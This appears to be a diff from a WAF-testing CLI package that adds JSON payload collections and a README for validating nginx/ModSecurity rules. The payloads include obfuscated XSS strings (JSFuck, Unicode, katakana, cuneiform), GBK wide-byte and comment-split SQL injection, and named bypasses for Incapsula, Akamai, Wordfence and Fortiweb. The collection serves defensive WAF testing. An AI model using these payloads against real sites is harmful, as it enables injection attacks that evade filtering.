@waftester/cli 2.8.0

package/payloads/community/waf-bypass/unicode-charset.json

@@ -0,0 +1,152 @@
+[
+  {
+    "id": "UNI-XSS-001",
+    "payload": "<script>\\u0061\\u006C\\u0065\\u0072\\u0074(1)</script>",
+    "tags": ["unicode", "escape", "basic"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "Unicode escape for 'alert' - basic bypass",
+    "category": "WAF-Bypass",
+    "source": "PayloadsAllTheThings"
+  },
+  {
+    "id": "UNI-XSS-002",
+    "payload": "<ſvg onload=alert(1)>",
+    "tags": ["unicode", "case-transform", "svg"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Long S (ſ) transforms to 'S' via toUpperCase() - becomes <SVG>",
+    "category": "WAF-Bypass",
+    "source": "PayloadsAllTheThings"
+  },
+  {
+    "id": "UNI-XSS-003",
+    "payload": "<ıframe onload=alert(1)>",
+    "tags": ["unicode", "case-transform", "iframe"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Dotless I (ı) transforms to 'I' via toUpperCase() - becomes <IFRAME>",
+    "category": "WAF-Bypass",
+    "source": "PayloadsAllTheThings"
+  },
+  {
+    "id": "UNI-XSS-004",
+    "payload": "javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()",
+    "tags": ["unicode", "katakana", "obfuscation", "advanced"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Katakana-based alert() using aemkei/katakana.js technique",
+    "category": "WAF-Bypass",
+    "source": "PayloadsAllTheThings"
+  },
+  {
+    "id": "UNI-XSS-005",
+    "payload": "𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+\"(𒀀)\")()",
+    "tags": ["unicode", "cuneiform", "obfuscation", "advanced"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Cuneiform script obfuscated alert() - extreme bypass",
+    "category": "WAF-Bypass",
+    "source": "PayloadsAllTheThings"
+  },
+  {
+    "id": "UNI-XSS-006",
+    "payload": "[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()",
+    "tags": ["unicode", "jsfuck", "obfuscation", "advanced"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "JSFuck - JavaScript using only []()!+ characters - alert(1)",
+    "category": "WAF-Bypass",
+    "source": "PayloadsAllTheThings/JSFuck"
+  },
+  {
+    "id": "UNI-XSS-007",
+    "payload": "%26%2397;lert(1)",
+    "tags": ["unicode", "html-entity", "encoded"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "Double-encoded HTML entity for 'a' in alert",
+    "category": "WAF-Bypass",
+    "source": "PayloadsAllTheThings"
+  },
+  {
+    "id": "UNI-XSS-008",
+    "payload": "&#97;&#108;&#101;&#114;&#116;",
+    "tags": ["unicode", "decimal-entity", "basic"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "Decimal HTML entities spelling 'alert'",
+    "category": "WAF-Bypass",
+    "source": "PayloadsAllTheThings"
+  },
+  {
+    "id": "UNI-XSS-009",
+    "payload": "></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)>",
+    "tags": ["unicode", "double-encoded", "svg"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Double-encoded entities in SVG onload",
+    "category": "WAF-Bypass",
+    "source": "PayloadsAllTheThings"
+  },
+  {
+    "id": "UNI-XSS-010",
+    "payload": "＜script＞alert(1)＜/script＞",
+    "tags": ["unicode", "fullwidth", "less-than"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "Fullwidth Unicode < and > (U+FF1C, U+FF1E)",
+    "category": "WAF-Bypass",
+    "source": "PayloadsAllTheThings"
+  },
+  {
+    "id": "CHARSET-SQL-001",
+    "payload": "%bf%27 OR 1=1--",
+    "tags": ["charset", "gbk", "wide-byte", "sqli"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "GBK wide byte injection - %bf%27 forms valid multibyte + quote",
+    "category": "WAF-Bypass",
+    "source": "PayloadsAllTheThings"
+  },
+  {
+    "id": "CHARSET-SQL-002",
+    "payload": "%a1%27 OR 1=1--",
+    "tags": ["charset", "gbk", "wide-byte", "sqli"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "GBK wide byte variant - %a1%27",
+    "category": "WAF-Bypass",
+    "source": "PayloadsAllTheThings"
+  },
+  {
+    "id": "CHARSET-SQL-003",
+    "payload": "%8C%A8%27 OR 1=1--",
+    "tags": ["charset", "gbk", "wide-byte", "sqli"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "GBK wide byte triple-byte variant",
+    "category": "WAF-Bypass",
+    "source": "PayloadsAllTheThings"
+  },
+  {
+    "id": "CHARSET-SQL-004",
+    "payload": "%A8%27 OR 1=1--",
+    "tags": ["charset", "gbk", "wide-byte", "sqli"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "GBK wide byte - eats escape backslash",
+    "category": "WAF-Bypass",
+    "source": "PayloadsAllTheThings"
+  },
+  {
+    "id": "CHARSET-SQL-005",
+    "payload": "%bf%5c' OR 1=1--",
+    "tags": ["charset", "gbk", "backslash-eat", "sqli"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "GBK wide byte - consumes backslash escape",
+    "category": "WAF-Bypass",
+    "source": "PayloadsAllTheThings"
+  }
+]

package/payloads/community/waf-bypass/vendor-bypasses.json

@@ -0,0 +1,72 @@
+[
+  {
+    "id": "WAF-INCAP-001",
+    "payload": "<svg onload\\r\\n=$.globalEval(\"al\"+\"ert()\");>",
+    "tags": ["incapsula", "waf-bypass", "newline", "2019"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Incapsula bypass - newline in event handler (May 2019)",
+    "category": "WAF-Bypass",
+    "source": "PayloadsAllTheThings"
+  },
+  {
+    "id": "WAF-INCAP-002",
+    "payload": "anythinglr00</script><script>alert(document.domain)</script>uxldz",
+    "tags": ["incapsula", "waf-bypass", "script-break", "2018"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Incapsula bypass - garbage prefix/suffix (Mar 2018)",
+    "category": "WAF-Bypass",
+    "source": "PayloadsAllTheThings"
+  },
+  {
+    "id": "WAF-INCAP-003",
+    "payload": "<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>",
+    "tags": ["incapsula", "waf-bypass", "data-uri", "base64", "2018"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Incapsula bypass - data URI with multiple semicolons (Sep 2018)",
+    "category": "WAF-Bypass",
+    "source": "PayloadsAllTheThings"
+  },
+  {
+    "id": "WAF-AKAMAI-001",
+    "payload": "?\"></script><base%20c%3D=href%3Dhttps:\\mysite>",
+    "tags": ["akamai", "waf-bypass", "base-tag", "2018"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Akamai bypass - base tag injection (Jun 2018)",
+    "category": "WAF-Bypass",
+    "source": "PayloadsAllTheThings"
+  },
+  {
+    "id": "WAF-AKAMAI-002",
+    "payload": "<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>",
+    "tags": ["akamai", "waf-bypass", "details", "case-toggle", "2018"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Akamai bypass - details tag with newlines (Oct 2018)",
+    "category": "WAF-Bypass",
+    "source": "PayloadsAllTheThings"
+  },
+  {
+    "id": "WAF-WORDFENCE-001",
+    "payload": "<a href=javas&#99;ript:alert(1)>",
+    "tags": ["wordfence", "waf-bypass", "entity", "2018"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "WordFence bypass - HTML entity in javascript protocol (Sep 2018)",
+    "category": "WAF-Bypass",
+    "source": "PayloadsAllTheThings"
+  },
+  {
+    "id": "WAF-FORTIWEB-001",
+    "payload": "\\u003e\\u003c\\u0068\\u0031 onclick=alert('1')\\u003e",
+    "tags": ["fortiweb", "waf-bypass", "unicode-escape", "2019"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Fortiweb bypass - Unicode escape sequences (Jul 2019)",
+    "category": "WAF-Bypass",
+    "source": "PayloadsAllTheThings"
+  }
+]

package/payloads/community/waf-validation/README.md

@@ -0,0 +1,172 @@
+# WAF Validation Test Suite
+
+## Overview
+
+Enterprise-grade security testing payloads specifically designed to validate nginx + ModSecurity WAF configurations. These tests ensure your WAF is properly configured, blocks malicious requests, and doesn't create false positives on legitimate traffic.
+
+## Test Categories
+
+### 1. `modsecurity-core.json` (15 payloads)
+Tests for OWASP Core Rule Set (CRS) categories:
+- CRS 941: Cross-Site Scripting (XSS)
+- CRS 942: SQL Injection
+- CRS 930: Local File Inclusion (LFI)
+- CRS 934: Server-Side Request Forgery (SSRF)
+- CRS 932: Remote Code Execution (RCE)
+- CRS 931: XML External Entities (XXE)
+- CRS 944: Server-Side Template Injection (SSTI)
+- CRS 913: Scanner Detection
+
+### 2. `custom-rules.json` (23 payloads)
+Tests for custom ModSecurity rules (9999001-9999006):
+- **9999001**: Path traversal patterns (`../`)
+- **9999002**: Command injection (`; | \` $()`)
+- **9999003**: Null bytes in webhooks (`%00`)
+- **9999004**: Immich asset path traversal
+- **9999005**: Static asset logging (skip logging)
+- **9999006**: DNS rebinding / host header attacks
+
+### 3. `bypass-techniques.json` (30 payloads)
+Common WAF bypass techniques:
+- Case variation (sElEcT, SCRIPT)
+- URL encoding (single, double)
+- Unicode encoding (fullwidth, homoglyphs)
+- Null byte injection
+- Comment insertion (SQL, HTML)
+- HTTP Parameter Pollution
+- Protocol handler abuse
+
+### 4. `evasion-techniques.json` (30 payloads)
+Advanced evasion techniques:
+- Chunked transfer encoding
+- Multiline header injection
+- String concatenation
+- Scientific notation
+- Buffer overflow attempts
+- Content-Length mismatch
+- JSON/NoSQL injection
+- Multipart form abuse
+- Charset encoding tricks (UTF-7, overlong UTF-8)
+- HTTP method override
+- Path confusion
+- Request smuggling
+
+### 5. `owasp-top10.json` (26 payloads)
+OWASP Top 10 2021 coverage:
+- A01: Broken Access Control
+- A02: Cryptographic Failures (info)
+- A03: Injection
+- A04: Insecure Design
+- A05: Security Misconfiguration
+- A06: Vulnerable Components
+- A07: Authentication Failures
+- A08: Software Data Integrity
+- A09: Logging Failures (Log4Shell)
+- A10: SSRF
+
+### 6. `regression-tests.json` (25 payloads)
+Legitimate traffic validation (should NOT be blocked):
+- API health checks
+- Normal login requests
+- Pagination queries
+- Search with SQL-like words
+- Apostrophe in names (O'Brien)
+- HTML content in JSON
+- Email addresses
+- Code/formula content
+- Service-specific endpoints (n8n, Immich, Authentik, AgreementPulse)
+
+## Usage
+
+### Quick Validation
+```powershell
+# Test WAF with quick profile
+.\Run-SecurityTests.ps1 test -Quick -TargetUrl https://your-waf.example.com
+```
+
+### Full WAF Validation
+```powershell
+# Test all WAF validation payloads
+.\Run-SecurityTests.ps1 test -Category WAF-Validation -TargetUrl https://your-waf.example.com
+```
+
+### Regression Testing
+```powershell
+# Ensure WAF doesn't block legitimate requests
+.\Run-SecurityTests.ps1 test -Category Regression -TargetUrl https://your-waf.example.com
+```
+
+### OWASP Top 10 Coverage
+```powershell
+# Full OWASP Top 10 coverage test
+.\Run-SecurityTests.ps1 test -Category OWASP-Top10 -TargetUrl https://your-waf.example.com
+```
+
+## Expected Results
+
+### For Security Payloads
+- **Expected**: HTTP 403 (Blocked)
+- **Failure**: HTTP 200/other (WAF bypass)
+
+### For Regression Tests
+- **Expected**: HTTP 200 (Allowed)
+- **Failure**: HTTP 403 (False positive)
+
+## CI/CD Integration
+
+Add to your pipeline:
+```yaml
+- name: WAF Validation
+  run: |
+    cd tests
+    ./Run-SecurityTests.ps1 test -Category WAF-Validation -OutputFormat JUnit -OutputPath results.xml
+    ./Run-SecurityTests.ps1 test -Category Regression -OutputFormat JUnit -OutputPath regression.xml
+```
+
+## Adding New Tests
+
+### Payload Schema
+```json
+{
+  "id": "UNIQUE-ID-001",
+  "payload": "GET /path?param=<attack-vector>",
+  "tags": ["category", "subcategory", "quick"],
+  "expected_block": true,
+  "severity_hint": "Critical|High|Medium|Low",
+  "notes": "Description of what this tests",
+  "category": "WAF-Validation|WAF-Bypass|Regression|OWASP-Top10"
+}
+```
+
+### Naming Convention
+- `CRS-{rule}-{variant}`: OWASP CRS rule tests
+- `RULE-{id}-{variant}`: Custom rule tests
+- `BYPASS-{technique}-{variant}`: Bypass technique tests
+- `EVASION-{technique}-{variant}`: Evasion technique tests
+- `OWASP-{category}-{variant}`: OWASP Top 10 tests
+- `LEGIT-{service}-{variant}`: Regression/legitimate tests
+
+## Coverage Matrix
+
+| Attack Category | CRS Rules | Custom Rules | Bypass Tests | Total |
+|-----------------|-----------|--------------|--------------|-------|
+| SQL Injection   | 942       | -            | 8+           | 15+   |
+| XSS             | 941       | -            | 6+           | 12+   |
+| Path Traversal  | 930       | 9999001,4    | 4+           | 10+   |
+| Command Injection| 932      | 9999002      | 4+           | 8+    |
+| SSRF            | 934       | -            | 6+           | 10+   |
+| XXE             | 931       | -            | 2+           | 4+    |
+| SSTI            | 944       | -            | 2+           | 4+    |
+| DNS Rebinding   | -         | 9999006      | 2+           | 4+    |
+| Request Smuggling| -        | -            | 4+           | 4+    |
+
+## Total Payload Count
+
+- **modsecurity-core.json**: 15 payloads
+- **custom-rules.json**: 23 payloads
+- **bypass-techniques.json**: 30 payloads
+- **evasion-techniques.json**: 30 payloads
+- **owasp-top10.json**: 26 payloads
+- **regression-tests.json**: 25 payloads
+
+**Total: 149 enterprise-grade WAF validation payloads**

package/payloads/community/waf-validation/bypass-techniques.json

@@ -0,0 +1,272 @@
+[
+  {
+    "id": "BYPASS-CASE-001",
+    "payload": "GET /?id=1' oR '1'='1",
+    "tags": ["bypass", "case-variation", "sqli", "quick"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Mixed case SQLi bypass attempt",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "BYPASS-CASE-002",
+    "payload": "GET /?q=<ScRiPt>alert(1)</ScRiPt>",
+    "tags": ["bypass", "case-variation", "xss", "quick"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Mixed case XSS bypass attempt",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "BYPASS-ENCODE-001",
+    "payload": "GET /?id=%27%20OR%20%271%27%3D%271",
+    "tags": ["bypass", "url-encoding", "sqli", "quick"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "URL-encoded SQLi: ' OR '1'='1",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "BYPASS-ENCODE-002",
+    "payload": "GET /?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E",
+    "tags": ["bypass", "url-encoding", "xss", "quick"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "URL-encoded XSS",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "BYPASS-ENCODE-003",
+    "payload": "GET /?id=%2527%2520OR%2520%25271%2527%253D%25271",
+    "tags": ["bypass", "double-encoding", "sqli", "quick"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Double URL-encoded SQLi",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "BYPASS-ENCODE-004",
+    "payload": "GET /?q=\\x3cscript\\x3ealert(1)\\x3c/script\\x3e",
+    "tags": ["bypass", "hex-encoding", "xss"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Hex-escaped XSS",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "BYPASS-UNICODE-001",
+    "payload": "GET /?q=＜script＞alert(1)＜/script＞",
+    "tags": ["bypass", "unicode", "xss", "quick"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Fullwidth Unicode XSS bypass",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "BYPASS-UNICODE-002",
+    "payload": "GET /?id=1' ＯＲ '1'='1",
+    "tags": ["bypass", "unicode", "sqli"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Fullwidth Unicode SQLi OR",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "BYPASS-COMMENT-001",
+    "payload": "GET /?id=1'/**/OR/**/1=1--",
+    "tags": ["bypass", "comment-injection", "sqli", "quick"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "SQL comment bypass",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "BYPASS-COMMENT-002",
+    "payload": "GET /?q=<scr<!--comment-->ipt>alert(1)</script>",
+    "tags": ["bypass", "comment-injection", "xss"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "HTML comment XSS bypass",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "BYPASS-WHITESPACE-001",
+    "payload": "GET /?id=1'\t\nOR\t\n'1'='1",
+    "tags": ["bypass", "whitespace", "sqli", "quick"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Tab/newline SQLi bypass",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "BYPASS-WHITESPACE-002",
+    "payload": "GET /?q=<script\t\n>alert(1)</script>",
+    "tags": ["bypass", "whitespace", "xss"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Whitespace in tag XSS bypass",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "BYPASS-NULL-001",
+    "payload": "GET /?id=1'%00OR '1'='1",
+    "tags": ["bypass", "null-byte", "sqli", "quick"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Null byte SQLi bypass",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "BYPASS-NULL-002",
+    "payload": "GET /?q=<scr%00ipt>alert(1)</script>",
+    "tags": ["bypass", "null-byte", "xss"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Null byte XSS bypass",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "BYPASS-CONCAT-001",
+    "payload": "GET /?id=1' OR 'a'='a",
+    "tags": ["bypass", "alternative-syntax", "sqli"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Alternative SQLi syntax",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "BYPASS-CONCAT-002",
+    "payload": "GET /?id=1' OR 0x31=0x31",
+    "tags": ["bypass", "hex-values", "sqli"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Hex value comparison SQLi",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "BYPASS-FUNCTION-001",
+    "payload": "GET /?id=1' OR CHAR(49)=CHAR(49)--",
+    "tags": ["bypass", "function-obfuscation", "sqli", "quick"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "CHAR function SQLi bypass",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "BYPASS-FUNCTION-002",
+    "payload": "GET /?id=1' OR ASCII('1')=49--",
+    "tags": ["bypass", "function-obfuscation", "sqli"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "ASCII function SQLi bypass",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "BYPASS-CONCAT-003",
+    "payload": "GET /?id=1' OR CONCAT('1','1')='11'--",
+    "tags": ["bypass", "function-obfuscation", "sqli"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "CONCAT function SQLi bypass",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "BYPASS-NESTED-001",
+    "payload": "GET /?q=<img src=x onerror=alert(1)>",
+    "tags": ["bypass", "event-handler", "xss", "quick"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Event handler XSS",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "BYPASS-NESTED-002",
+    "payload": "GET /?q=<svg onload=alert(1)>",
+    "tags": ["bypass", "svg", "xss", "quick"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "SVG onload XSS",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "BYPASS-NESTED-003",
+    "payload": "GET /?q=<body onpageshow=alert(1)>",
+    "tags": ["bypass", "event-handler", "xss"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "onpageshow event XSS",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "BYPASS-PROTO-001",
+    "payload": "GET /?url=javascript:alert(1)",
+    "tags": ["bypass", "protocol-handler", "xss", "quick"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "javascript: protocol XSS",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "BYPASS-PROTO-002",
+    "payload": "GET /?url=data:text/html,<script>alert(1)</script>",
+    "tags": ["bypass", "data-uri", "xss", "quick"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "data: URI XSS",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "BYPASS-PROTO-003",
+    "payload": "GET /?url=vbscript:msgbox(1)",
+    "tags": ["bypass", "protocol-handler", "xss"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "vbscript: protocol (IE legacy)",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "BYPASS-HPP-001",
+    "payload": "GET /?id=1&id=' OR '1'='1",
+    "tags": ["bypass", "hpp", "sqli", "quick"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "HTTP Parameter Pollution SQLi",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "BYPASS-HPP-002",
+    "payload": "GET /?q=safe&q=<script>alert(1)</script>",
+    "tags": ["bypass", "hpp", "xss"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "HTTP Parameter Pollution XSS",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "BYPASS-CHUNK-001",
+    "payload": "GET /?id=1' OR&id= '1'='1",
+    "tags": ["bypass", "parameter-fragmentation", "sqli"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Fragmented parameter SQLi",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "BYPASS-OVERLONG-001",
+    "payload": "GET /?id=%c0%27 OR '1'='1",
+    "tags": ["bypass", "overlong-utf8", "sqli"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Overlong UTF-8 encoded quote SQLi",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "BYPASS-HEADER-001",
+    "payload": "POST / HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nX-Forwarded-For: 127.0.0.1\r\n\r\nid=1' OR '1'='1",
+    "tags": ["bypass", "header-injection", "sqli"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "SQLi in POST body with header manipulation",
+    "category": "WAF-Bypass"
+  }
+]